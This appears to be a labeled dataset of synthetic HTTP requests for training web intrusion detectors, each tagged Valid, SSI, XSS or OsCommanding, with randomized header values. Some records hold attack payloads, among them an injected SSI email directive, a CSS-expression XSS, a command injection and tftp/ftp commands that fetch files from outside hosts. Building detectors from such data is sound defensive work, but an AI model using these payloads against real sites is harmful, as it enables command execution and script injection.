If-Match: "RTxZ1sR67Z3TJWYy"
If-None-Match: "u0fSoIfnddimbzeinFRW"
If-Range: Mon, 08 Dec 08 22:20:01 GMT
Max-Forwards: 175
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: NTLM MGk1dmFlcm9mbjJtbnRkcU5kaG9TTGVUbmZwRWw0eWcwcmI0ZU1v
Authorization: iEnSn rtsuen=elaaow6a
Range: -57,295976-,-66
Referer: http://www.rieaea.st/sytex5S/eH0w/dw7tdeec/ed4kln.asp
TE: deflate;q=0.7,chunked,chunked
Trailer: Pragma
User-Agent: Mozilla/0.3 (X11; U; Solaris 3.9; an-On; rv:4.8.3) Gecko/60101950
UA-CPU: PowerPC
UA-Disp: 814,975,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3062x279
Via: HTTP/0.3 www.eso7.gif, HTTP/3.3 www.seaodi.png
Transfer-Encoding: identity
Upgrade: sSsh0/2.9, sad61a/4.3, eEno/3.4, 1jEe/1.8, Sde/6.5
Warning: 330 www.Oteemon.tiff:442 "eenlria" 
X-Forwarded-For: 152.18.212.8
X-Serial-Number: 1285901452667782524
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

oh=6985&otOfHlrtnooa4e=4&ntjj1=rqxsam8r&positionWMAnFQTlKr=u43ee(n

End - Id: 6015
Start - Id: 39381
class: SSI
GET /Xm0ftBYbD2ZT/tnrkIderlns5t/semnevuxtme7lrr/mjZyXeW2tAz-HMR/G2M2WZLj8tKiframeW/tQ2m/8W9_/lastdb4asUeutwcabi/hlsnife/tz/d8TzoQSa-5GqvlYq5d/erdteatSeeEle3q.nsf?odiioj3L=899664967&ope3o=tzLSbB&e5cr=yrufhviN9bn7dHs&ndolnseoeau=th%40tiellhso&nm=sy9wfUSLPp&neal=Og+&dai3i=mnrta%24o%3Ef&erswd5unt=%3C%21--%23email+fromhost%3D%22www.nurtln.com%22+tohost%3D%22mailbox.soast.com%22+message%3D%22e1mtt+yhhhrgi+m5f+siotpw%22+fromaddress%3D%225Geeb.com%22+toaddress%3D%22toc5i.Va.com%22+subject%3D%22RT%22+sender%3D%22mtne.com%22+replyto%3D%22eopreea.com%22+cc%3D%22sa%22+inreplyto%3D%22maf+teH+e%22+id%3D%22eo4nCmail%22+--%3E&alrWuljv8hsh3sl=servicest%2Bali7%3A&4ttbbn=ehkMeftreaosOnull&HJ150o1=5&tuoesar=weradlednb4k6zs1s&izrovrdguate=dmxwZCMFF HTTP/1.1
Host: www.e9ul3m2m.ch
Connection: garsotnd
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.5, gzip;q=0.7, identity
Accept-Language: nuee-Asteth;q=0.4, h-6, usarsdcb-mtEah, n-huiocE, T-l40et
Cache-Control: rl1tncfe='tratr'
Client-ip: 199.73.230.133
Cookie: BgImBGnodejQ7g=c6ou;suwnsr=820;UeBy=@;itlSgAN=nae
Cookie2: $Version="23"
Date: Mon, 21 Nov 05 03:09:32 UTC
ETag: "NH0nqaIAQJf.Juk35"
Expect: 100-continue
From: lrS1n@ltwen24wwu.net
If-Modified-Since: Thu, 22 May 08 11:52:37 GMT
If-Unmodified-Since: Sun, 25 Feb 07 18:16:42 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 05 Dec 09 14:27:36 GMT
Max-Forwards: 577
MIME-Version: 0.0
Pragma: estre=tolryoa
Proxy-Authorization: NTLM N3RGc3RpbGRnanRleWRzUGthc3MwcmVldGlESmo4ck4=
Authorization: Basic ZW90c1M6Y3BpZXI=
Range: -7403,569103-
Referer: /areOtqcS/fsiadd/sbyc.asp
TE: gzip;q=0.6,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/2.6 (Machintosh; U; Mac OS X 8.5; u9-ac; rv:5.4.3) Gecko/12453703
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 757x2155
Via: HTTP/4.2 100.28.171.184, FTP/9.2 www.ruhntn5e.jpg, HTTP/1.6 6.19.55.50
Transfer-Encoding: baag
Upgrade: Trtet/1.3, sieet/3.4, eced/6.6, yns/9.1, snfH/3.3
Warning: 718 12.78.142.38 "hTEovTag" 
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 3967259354
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39381
Start - Id: 14602
class: Valid
GET /ikuK8Faaq2QGby8fTp/ldEvmREf/sntri63eldeb5g/1kot2hpsbk7bt8h/7nYsJZ.m/opoKmz/dTYkAnFM8srfVRK/fUkeUPwVLI.png?tp7iirntYt=6361666&cQPJz4HY7P=0512&kTryuS=bczCrfimtoJte5e&wlCNssey=+&ayp1ridsi=1+iryoS&z0nslwwn43twtwz=77&pvsXsetheinjrEL=4349128&hovi=oakl6941hcjass&ytn6crft=6ti8vl-&ouikP9berId=sam8dhesA%297atasystemhesm+t&fn2estoir=%5Cg&nsolmliep206=4&xT1XdroplibV=em&n8iei8t=tsNidVe&nr=hKREStq3%40i HTTP/1.0
Host: www.ehrg.st
Connection: enpX1r
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 24.117.75.187
Cookie: euntehgotsa=670;wusntqe=jk;N8T@=hlrwi7
Cookie2: $Version="00"
Date: Wed, 22 Aug 07 19:55:01 CET
ETag: W/"oXAYmJKz_rFi9g3SM5b"
Expect: tjvtt
From: eirCa@7IsHdnie.com
If-Modified-Since: Thu, 26 Feb 04 04:52:40 GMT
If-Unmodified-Since: Thu, 11 Jun 09 22:20:38 UTC
If-Match: *
If-None-Match: "QZVHf70Mhe_7M0yfwO"
If-Range: *
Max-Forwards: 282
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: oeooen miaa0al=k3tnrkq
Authorization: Basic bm1udHNhOmVyeWk=
Range: 45-4785,-21867,70176-3030
Referer: /Onneumqp.dll
TE: trailers
Trailer: Referer
User-Agent: Mozilla/2.5 (X11; U; SunOS sun4u 7.8; Cn-E1; rv:2.5.9) Gecko/74341095
UA-CPU: Sparc
UA-Disp: 1652,237,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 042x922
Via: FTP/2.3 104.96.145.39
Transfer-Encoding: u7nr
Upgrade: aAup/3.4, wlhsoh/9.7, nbao/4.6
Warning: 000 www.numyS7n.jpeg "esddptrgentnybcO" 
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 12480
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 14602
Start - Id: 14126
class: Valid
GET /ojywj1o2dpdXv1a.@Iy_/dQQoeimiibfymw/yXh/SS/i2l1/ra575Jn/s9e/pwbUGOIupdateP/ivNyVUY/hrkgWObO8WF7rjH/ft.gif?eleftt=lTzbR-2_FpS HTTP/1.1
Host: 71.176.80.188:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: aa-tnzee;q=0.0, rgs-dccteH, neue-thtEa;q=0.9, f-enremt;q=0.1
Cache-Control: min-fresh=47836
Client-ip: 228.74.5.236
Cookie: ana=ziR)tu aeslsystem6n 8t;p1GiK=enaZprihushi
Cookie2: $Version="97"
Date: Sat, 17 Jan 04 18:49:58 UTC
ETag: "ooFB3gCox2n@LfFB"
Expect: ewBta
From: zess@lSzAtt.de
If-Modified-Since: Mon, 01 Mar 10 19:04:47 CET
If-Unmodified-Since: Thu, 13 Jan 05 15:11:58 UTC
If-Match: "XO1RR1ENZqsLB74co"
If-None-Match: *
If-Range: Thu, 28 Apr 05 23:40:02 UTC
Max-Forwards: 8134
MIME-Version: 8.5
Pragma: d='1ioEM'
Proxy-Authorization: OcS4cT tuh8dxe=wudn
Authorization: 4nqiI icrstfm=nninuewi
Range: -445,968337-8
Referer: http://www.1lbeae.cz/ciaeE/sout6inn.js
TE: chunked,deflate;q=0.4,gzip
Trailer: Trailer
User-Agent: Mozilla/1.0 (Machintosh; U; PPC Mac OS X 4.5; re-ct; rv:5.0.2) Gecko/20777277
UA-CPU: x86
UA-Disp: 366,5288,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 054x638
Via: 4.6 www.atiagA.html
Transfer-Encoding: abawg; aotIT3=gpnna
Upgrade: eDh/9.0, etm/6.2
Warning: 021 63.233.31.79 "yeinsrEe0N9" 
X-Forwarded-For: 192.192.53.173
X-Serial-Number: 76880037963777825874
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14126
Start - Id: 47489
class: XSS
GET /i_.cfm?c9zeontWz=9&oyivnle=auwden&jrn8lt=4315&em=1&ci0Abiukcekltet=sUQLc8a%40EO&jIpttaoOfiK=%3Cdiv+style+++%3D+%22+++++width%3A++++expression%28%5Balert+++%28%27h6er9Aop%27%29%3B%5D%29%3B++%22++++%3E&2mot=dJQZpNQI5Bw&MWkGwqMYNLGs=q9ot%29r+&EemiMU0e=7de%3Bgoleralenshsgure&mk=%5Csstdint%7Et%3A&67nuEplb8n=scriptwinntIe6&g5oarrtsc=m6YnfhF4%3EeaTtl%28style&cattsn=nxkd8mtwrrupdateZ HTTP/1.0
Host: 159.91.210.13
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.1
Cache-Control: min-fresh=9456
Client-ip: 229.228.100.156
Cookie: imlta=57078;noceAettlE=2706995688;avegvyan=elsg7i;oy=uIzi;nsurle=t;adgfrsdaeicd4rh=45749
Cookie2: $Version="65"
Date: Tue, 01 Apr 08 16:26:05 UTC
ETag: W/"Q.aFiei1JBvNXi@"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Fri, 12 Jun 09 18:22:27 UTC
If-Unmodified-Since: Sun, 31 Aug 08 12:28:57 CET
If-Match: "FsTHcUvp29pyWwR"
If-None-Match: "@@TD0DOPZdnF0sLpZ28"
If-Range: Fri, 19 Jun 09 10:03:58 GMT
Max-Forwards: 556
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic aXJvZXA6Y3NlYWFyYg==
Authorization: jeobj itene=iembtoa
Range: 9183-933,-0
Referer: http://www.tnon.org/eot7j81/sE3r/eEuis/mcra.swf
TE: gzip,gzip;q=0.2
Trailer: Authorization
User-Agent: Mozilla/3.3 (Windows; U; Windows NT 8.5; zp-eo; rv:5.8.9) Gecko/34595397
UA-CPU: x86
UA-Disp: 612,9205,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 747x653
Via: gIrrrH/6.6 www.rcjtdn.jpeg, tra/8.9 www.ahsnPpb7.htm, 6.1 www.nsoaofvo.tiff
Transfer-Encoding: iTgo6
Upgrade: oC5/7.6, roncea/9.4, deA6/1.6
Warning: 858 www.Bomdfr.html:92 "eaLxhrCi8Tuapar" 
X-Forwarded-For: 223.101.141.206
X-Serial-Number: 48112496441051
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47489
Start - Id: 29031
class: Valid
GET /aO/ntzT29o5p5iX_/unePebr/nEx--Uu/n_6clkLc/HVmwAeopen/shp.jpeg?a6r=nKVM8VHMTk&smanelatca3Llh=954&eeeospn5=ehtaccesnt&2ceAsettxezepr=h&aenrtmtNc=e%29echo&eiholbknyasocr=pr&WSXhomes7y=fu%3FmlcFu&suashn=hsbPE&lotsiulaia=6inecopy&soae=56 HTTP/1.1
Host: 134.32.92.20
Connection: close
Accept: image/png;q=0.7, text/html
Accept-Charset: *
Accept-Encoding: *
Accept-Language: o9cg-zudir;q=0.8, s3SthT6-if;q=0.9
Cache-Control: ohct3een='rdia'
Client-ip: 155.37.251.194
Cookie: rodo=ieidocumentmsuftp]ruh;uwtmoose=trtwnhfaheoolooatt;AWdtX2_=70;nrlkewprrto=028108;e5iS=BsezrntE3LtssrRnlg;Fayarimmr=8
Cookie2: $Version="6"
Date: Sun, 03 May 09 18:11:10 GMT
ETag: W/"UeO1g_PkfX09EQZ"
Expect: 100-continue
From: te6nde@Ieee0ntr7.net
If-Modified-Since: Tue, 02 Nov 04 07:42:21 CET
If-Unmodified-Since: Tue, 18 Jan 05 12:14:30 GMT
If-Match: "FkcBew.o6I0TXUaybd9g"
If-None-Match: *
If-Range: Sat, 27 Feb 10 19:41:42 UTC
Max-Forwards: 3
MIME-Version: 2.4
Pragma: ih=eiv
Proxy-Authorization: Basic OTdVdGxsOnVzcmxGZA==
Authorization: thstsa nciov3aa=n53wh
Range: 3-,5985-7558,753-
Referer: /saentr/ebSsi/uoe5e1/fnsi/ebcme3.gif
TE: chunked
Trailer: User-Agent
User-Agent: hpO8YbCI http://www.ogsghWs.de
UA-CPU: x86
UA-Disp: 6183,441,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 694x8428
Via: HTTP/3.3 56.45.24.26, 2.9 www.srhionm.html
Transfer-Encoding: w8srdn
Upgrade: erJF/7.0, 5yR/2.8, dpedX/3.1
Warning: 992 www.ntgo3cv.htm "seCcmng" "Wed, 13 Apr 05 13:20:02 CET"
X-Forwarded-For: 157.73.34.25
X-Serial-Number: 055751373307057
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29031
Start - Id: 43687
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .com? HTTP/1.1
Host: www.aiPa.be:95
Connection: nate
Accept: image/*;q=0.4, application/*
Accept-Charset: cp-936;q=0.1, cp-950;q=0.9, x-mac-turkish
Accept-Encoding: 
Accept-Language: o-re;q=0.5, saaAc-mnrdd6h, irlre-orn
Cache-Control: max-stale=4
Client-ip: 236.63.160.177
Cookie: pqtqeOtm5u1fta=438934;frctfnL=o\5iyun;w;stuesheGv8oa=74746;rdmto=i;Lmvo=ageh5tpcn
Cookie2: $Version="4"
Date: Sat, 20 Mar 10 16:49:58 UTC
ETag: "Ypk8OsVE4.PySPp"
Expect: 100-continue
From: o68nO@tetn70i.cz
If-Modified-Since: Thu, 06 Sep 07 22:27:26 CET
If-Unmodified-Since: Sun, 01 Oct 06 06:42:34 GMT
If-Match: "w@QVjMuwwxTIbtY6"
If-None-Match: *
If-Range: Wed, 16 May 07 08:39:28 UTC
Max-Forwards: 2827
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: csat8 fle0=tohc
Authorization: Digest algorithm=MD5
Range: 0932-655,7-822597,-7
Referer: /eoTrtt/eb8to/i8ptt.wav
TE: chunked,trailers,chunked
User-Agent: Mozilla/0.1 (X11; U; Open BSD i386 8.4; aS-ee; rv:7.4.1) Gecko/78058936
UA-CPU: PowerPC
UA-Disp: 0760,6921,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 827x275
Via: FTP/3.6 124.89.46.107
Transfer-Encoding: compress
Upgrade: as8/8.8, mad/2.6, pEyuj/1.9, o5a8/8.7, ewmi2m/5.2
Warning: 965 www.lhcrhue2.jpeg "khnjidedehslccnwsp" "Tue, 25 Jan 05 20:48:31 UTC"
X-Forwarded-For: 163.232.189.112
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43687
Start - Id: 28181
class: Valid
GET /aasnlveq99ycBXSrtmXA/m@z0vU2cWGX/@0/tnpftee/i6ginputbsock_stream8varC/axtb8T_7mVDd/n9/lD/Woq3a/eta/FDz.gif?roee=etiI%5C37id&letnn=69119313 HTTP/1.1
Host: 103.62.46.58
Connection: ilaa
Accept: text/plain;q=0.5
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: i-nhueTh;q=0.1, cwhr0-an2nsr2, rxns-euE;q=0.1, i-ELnij
Cache-Control: no-store
Client-ip: 23.218.78.181
Cookie: l4ts769aolrnht=5765267;olisrhpokdc=2;htdtdoltaaoU2=bimgr5$operl;connect(aoNwhere;aeoct=84
Cookie2: $Version="0"
Date: Wed, 02 Jan 08 11:34:47 GMT
ETag: W/"K1yk45T0uxV_vV61LvP"
Expect: 100-continue
From: haidri@m6zcet8gA.ch
If-Modified-Since: Wed, 04 Aug 04 15:38:25 UTC
If-Unmodified-Since: Sun, 20 Nov 05 10:03:52 UTC
If-Match: *
If-None-Match: *
If-Range: "zbYs3FPN3QOgi2LunJi"
Max-Forwards: 28
MIME-Version: 1.1
Pragma: lmCeIa=ceoejel
Proxy-Authorization: Digest realm
Authorization: rved6a nmSt=dNbe0
Range: -569,-376,5-
Referer: http://iexes1eg.be/ewto/vsdudfn/Lqie.php3
TE: deflate;q=0.8
Trailer: If-Unmodified-Since
User-Agent: d7pno/4.5.5.4
UA-CPU: MIPS
UA-Disp: 3034,654,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 709x9320
Via: 1.0 151.197.79.223, 7.4 www.HkswAn.js, 5.6 www.hrdh.png
Transfer-Encoding: identity
Upgrade: Stnpa/5.9, Fvmwd/0.5
Warning: 941 204.125.32.112 "Rsze" 
X-Forwarded-For: 242.176.161.203
X-Serial-Number: 7379357379156372061
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28181
Start - Id: 2472
class: Valid
GET /nd_C@qW2jR.php?Sdeseopt6AO=36810939&neschI5=o%7Em-%3A&i4TsNggaohhjuts=1766242&ege=u&bakrjEm=zepas5e+s%2Flfscript&z4i7y5flu6=sBp&ans6xiKtlom6b=2qshrslnha%3Chon&oseuTej4alse0=e5dhesapas&D9ncbetween89Pvaccess_logh=rmij-aclSsn14rOs+h%270dE&aoah=lEolieuseneIstO73&fasBbg=24845 HTTP/1.1
Host: 85.0.54.44:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: cp-936;q=0.4, utf-7;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: yrfI='utlrz5at'
Client-ip: 14.197.207.157
Cookie: olahnwh=La;taqtra=nl yhlobjectGtCsystemtupdate d
Cookie2: $Version="283"
Date: Wed, 17 Jan 07 11:42:05 CET
ETag: "lEZyoKqlTPQHPXajV4m"
Expect: iaOromb=mRptenj
From: 0s8tX@arsT.cz
If-Modified-Since: Tue, 27 Apr 04 06:47:48 CET
If-Unmodified-Since: Fri, 02 Dec 05 06:28:35 CET
If-Match: *
If-None-Match: *
If-Range: "tf0wccrUp30VvjdpicO"
Max-Forwards: 622
MIME-Version: 6.6
Pragma: ooQwqo='z'
Proxy-Authorization: Digest algorithm=asac0an
Authorization: Basic QXRlb3M4aG46c09Bd3JJ
Range: 0555-2,778762-,232388-
Referer: http://0bhcns4d.gov/ulso/eghd/e2hgsu/jnaaiesS.bin
TE: gzip;q=0.3,trailers
Trailer: Date
User-Agent: gqy9PhiOb8s
UA-CPU: x86
UA-Disp: 667,797,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 392x1193
Via: 0.0 17.202.28.4
Transfer-Encoding: compress
Upgrade: Hslrot/3.2, nPdtaa/1.1
Warning: 552 www.tsng.jpg:1 "tsmt879qcdlEstelgpx" "Wed, 23 Nov 05 20:06:09 UTC"
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 347745233258688600
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2472
Start - Id: 1793
class: Valid
GET /s-yEWYyucNOVr/ev4zw2KR/otdbiaetnfhono.css?xr6wlaieyuga=4hfe5+o%2B%3FIft%5Cn&snbmd=e5j+8&3BY4G=rs&cEoycmfk=tacmd3eincludeuaWiailndeoh HTTP/1.1
Host: www.sfir6.net
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman;q=0.4, windows-1253;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 183.111.200.232
Cookie: Ciea0do=62988;ctyrgrlct=t;DdITvbscriptjyPhtaccesD0T=95;eflrioter1mh=a6Y04VHnjE6;apwde=18;rfenn92dejee=373
Cookie2: $Version="396"
Date: Wed, 01 Jul 09 02:10:57 GMT
ETag: W/"0l4b4EjQF@zOGq4rP"
Expect: 100-continue
From: afReCmmd@ea5oe.uk
If-Modified-Since: Mon, 03 Oct 05 08:43:15 UTC
If-Unmodified-Since: Sun, 27 Feb 05 19:00:01 UTC
If-Match: *
If-None-Match: *
If-Range: "F0MFpNBltFPVQ6hW6AZ"
Max-Forwards: 848
MIME-Version: 0.4
Pragma: oLori=peCpd9mn
Proxy-Authorization: puyR ypeoqttF=hne2i
Authorization: Basic Z3Z2aWk3ZDpodTZ0MGxy
Range: 9724-,33511-083617,2-
Referer: http://abugqr.org/unnxbb.fgf
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: ep69ssenlm (i1G8urcvi7; a4yNv@; h5iYz29B.)
UA-CPU: x86
UA-Disp: 490,8525,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 912x237
Via: 0.8 154.2.1.137, FTP/6.7 www.jyEdzeaX.jpeg
Transfer-Encoding: identity
Upgrade: kvJiuk/8.5
Warning: 307 www.etnss2o.gif "ulniddsoy" 
X-Forwarded-For: 162.29.213.245
X-Serial-Number: 0392549
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1793
Start - Id: 7927
class: Valid
POST /oxlqbzseraslp5ErLei/Swjrltln0iri/8zafw1lL2l.tZVyXmCp/ua4l0ao.swf? HTTP/1.1
Content-Length: 189
Content-Language: uec
Content-Encoding: compress
Content-Location: /ltAfreee/eTorx/eoeanq/nupr.sh
Content-MD5: dHR1YkxuczlzcGllc3dlaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 23 Oct 09 11:35:03 UTC
Last-Modified: Tue, 07 Sep 04 20:17:33 GMT
Host: 65.191.242.94
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip, identity;q=0.8, deflate;q=0.2, compress;q=0.5, identity;q=0.2
Accept-Language: aghmrhTi-stoe;q=0.3
Cache-Control: no-transform
Client-ip: 231.8.109.142
Cookie: en=@Gmesnph-sqabgo;hAeI=907;rR=tql;3rMbw=426246
Cookie2: $Version="1"
Date: Thu, 02 Dec 04 14:46:25 UTC
ETag: W/"oTQFo@SSd4NGdyKj"
Expect: 100-continue
From: tnetvp@eecp.ch
If-Modified-Since: Sun, 09 Oct 05 10:09:47 UTC
If-Unmodified-Since: Sat, 10 Jul 04 03:15:18 CET
If-Match: ".PCGm9@M@mK57Q9Oe0Vs"
If-None-Match: *
If-Range: Sat, 21 May 05 09:08:19 UTC
Max-Forwards: 560
MIME-Version: 2.6
Pragma: o7=rtn
Proxy-Authorization: Digest username="sceiDcRc"
Authorization: Basic aGJoaTppdW9yZWFk
Range: 671-64,-9902
Referer: /3azychas/tdrna/irtohz/ieiiluf.jpeg
TE: trailers,deflate;q=0.9,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/9.7 (compatible; MSIE 7.1; Mac OS X; 9inlori; exaS1so6nc)
UA-CPU: PowerPC
UA-Disp: 828,669,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3690x874
Via: HTTP/0.1 26.3.208.112
Transfer-Encoding: compress
Upgrade: 1Zh/3.5, C8i/6.8, I4m/0.2
Warning: 376 www.Ae5dcnr.gif "8yaneahUte" 
X-Forwarded-For: 179.17.241.44
X-Serial-Number: 534170749
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eaoacil8iuun= u&xgywb9jfatioEi=gT?onbftys?x ath0&2zHr=356792074&5W3XEC@2BnQ=oOf&smdor3=wiEetdaiT&d1reed=E7ii1 hohj&Ckh=94&ewoe5ar=s  varstyle&r3ooycLdhCcn=dTelpu6ntD5saajoer&AA33bC=4762

End - Id: 7927
Start - Id: 43531
class: OsCommanding
GET /stsApopdnts/EpA1Zn3E/hto5tdaHausM2dtbyiuo/ikH5-xUP/ejjiqrCCS3wM2wbtY.css?6lAmi=7329&s2petnnn6zSz=%25ur&C._httpsEnZksC71=Omitnnc%2Fm&edStPu=tFgeuaIz_s5D&OOesI7geo=%27%3B+tftp++++-c++++get+www.orliie.com%3A%2Flira.tar HTTP/1.1
Host: www.thpYd.org:541
Connection: nyevait
Accept: audio/basic, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Vopltwnh-d
Cache-Control: min-fresh=6389
Client-ip: 214.70.1.175
Cookie: Eit=a3be;abembp=sock_streamuobr
Cookie2: $Version="7"
Date: Sun, 01 Jun 08 19:06:18 CET
ETag: "UWHJUoWEjR@OONOXor"
Expect: hhdoic
From: se0nS@elUienypa.de
If-Modified-Since: Thu, 03 Mar 05 02:41:30 UTC
If-Unmodified-Since: Tue, 02 May 06 20:24:44 CET
If-Match: *
If-None-Match: "8ghp6dkd5PT6QcxKx3jU"
If-Range: "@Hno5HZtNe7M8vKWO"
Max-Forwards: 77
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic QWFhaWM6cm5pb0Ez
Authorization: Digest qop=auth
Range: -983461,45-31195
Referer: http://www.rihrti5.it/tsns/0idheue8/eh5i/dOEeub2r/li66xe.gif
TE: gzip;q=0.3,trailers,chunked;q=0.2
Trailer: Expect
User-Agent: Oia2httn/7.6.9.9
UA-CPU: PowerPC
UA-Disp: 230,276,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 135x815
Via: 0.4 141.215.185.80, 8.7 202.95.9.21, 6.3 21.247.175.81
Transfer-Encoding: deflate
Upgrade: hlpxo/5.8, ate/4.1, k9h/8.3, atf7/2.6
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 118.79.162.108
X-Serial-Number: 00610632074
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43531
Start - Id: 43485
class: OsCommanding
GET /kBJdivecLI/rAlReatauiTesyo/hyX0FTgBT/etTatYgP/oPU-SzJJ/npAKyBx-NyLA/5MErYgBU3-/RbDvkfc/knt1mailV_acceptaw5S/Eineheamueeo5b0lrTvr.js?xzDyj63ReOCor=isl&heed0sv=iwtte&owwgroup byvbscriptY=+pp&n1iesvh=+petcmncmeta54&onissiEUase=oUW&@pdDrM@Gcacceptjb=%5Cn+uftp++++-p++++www.mellntremani.com++%2Fesveng%2Flaalseisllsi%2Fns%2Fveta%2Fie%2Fchre HTTP/1.1
Host: 160.252.96.224
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.7, identity;q=0.0
Accept-Language: cse-iWent;q=0.8, ybjHnes-neNlt, Hkxaat-e, tin-Mieueiz5, ej-TTb
Cache-Control: no-transform
Client-ip: 52.237.38.162
Cookie: tehcortl68gltm=ewkuier;nuouplCneynnet= en-iy2kuehS;reesadoav1oozae=rodqeeilcnreeetyr;nnndmeEa8ihern=dOx;reh=aiesroaEgimeprse
Cookie2: $Version="51"
Date: Thu, 24 Jul 08 06:00:51 UTC
ETag: W/"@K4eB7R86idDJqDsd"
Expect: 100-continue
From: oie3rs@dut5nl3e.uk
If-Modified-Since: Fri, 20 Jan 06 23:46:22 CET
If-Unmodified-Since: Thu, 05 Mar 09 17:52:26 GMT
If-Match: "XrFg0cK19tPtMBrhHyi"
If-None-Match: *
If-Range: "WDNBoEW.BPKas4Iq"
Max-Forwards: 7468
MIME-Version: 0.6
Pragma: h='de'
Proxy-Authorization: NTLM NnR4aWVvZGlyYVNkb3BlYmVlYXNvdGJqb3JtanJOcmF4OW11b2V4T2lkRQ==
Authorization: NTLM cHVob2l0dGNodG54THd0ZXNkbnRlb2lpaWF2ZXQ1d3phNGs=
Range: 4-
Referer: http://n4tn.it/lntnbz5t/3dhlhrz/lnsosf/tnoyt.mspx
TE: gzip,trailers,chunked;q=0.9
Trailer: Referer
User-Agent: Mozilla/9.2 (compatible; MSIE 2.9; Open BSD i386; axEttcir)
UA-CPU: Sparc
UA-Disp: 6546,0956,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2941x889
Via: FTP/9.9 252.93.53.182:570, eh1/6.3 250.73.91.161, FTP/4.0 www.rilae0.png
Transfer-Encoding: deflate
Upgrade: whvq9/8.8, onR/9.0, ohe/5.4
Warning: 847 www.0te1.css "ctnpcrbrylblaepn" "Wed, 02 Aug 06 09:38:06 UTC"
X-Forwarded-For: 137.226.116.122
X-Serial-Number: 5600215
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 43485
Start - Id: 23489
class: Valid
GET /ef-73ncu9o35O/s9iMbyv5A/a6GIXsbpuz0BgN/aec8rsu6slpcoomkps5y/ve6rHnl/pvuesydw7evp/aEzMX_.fFe8Mrq67sH/4rf2ecrn4iae/s8hfaQdxRe52EgG.mspx? HTTP/1.0
Host: www.snp1tlao.fr:2640
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: s-6nzi, ef-eedc;q=0.2, 6e-0cocmLr
Cache-Control: min-fresh=0
Client-ip: 190.224.239.165
Cookie: q9tie=ascfrspip;IwtmqI=80;YV9VpassthrupmUshutdownCG=vdrtz;ueyniNaeI=1460;wsq1yEe6W=4u;hemH0cisd9rs=723
Cookie2: $Version="08"
Date: Wed, 29 Dec 04 14:58:21 GMT
ETag: "uVh-.80MQ.CIBIv"
Expect: ntwanmr=ehse;cilvgi=Mo4Ptl7o
From: iarze6@uh4uku.biz
If-Modified-Since: Wed, 23 Aug 06 21:52:51 GMT
If-Unmodified-Since: Fri, 18 Apr 08 13:42:44 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 5.5
